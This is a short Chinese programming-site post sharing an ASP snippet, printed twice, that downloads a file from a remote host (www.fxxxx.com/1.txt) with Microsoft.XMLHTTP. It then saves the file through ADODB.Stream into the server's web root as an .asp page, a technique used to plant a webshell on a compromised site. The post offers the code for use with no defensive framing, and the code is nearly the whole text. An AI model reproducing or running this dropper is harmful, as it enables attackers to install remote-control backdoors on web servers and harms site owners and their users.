asp xmlhttp下载一句话
程序员文章站
2022-08-06 17:34:04
分享一下 在3est活动中学习的godlong的 复制代码 代码如下: <% set xpost = createobject("microsoft.xmlhttp"...
分享一下
在3est活动中学习的godlong的
<%
set xpost = createobject("microsoft.xmlhttp")
xpost.open "get","http://www.fxxxx.com/1.txt",0 '下载文件的地址
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile "e:\wwwroot\fuck1.asp",2
%>
在3est活动中学习的godlong的
复制代码 代码如下:
<%
set xpost = createobject("microsoft.xmlhttp")
xpost.open "get","http://www.fxxxx.com/1.txt",0 '下载文件的地址
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile "e:\wwwroot\fuck1.asp",2
%>
下一篇: ASP程序中使用断开的数据记录集的代码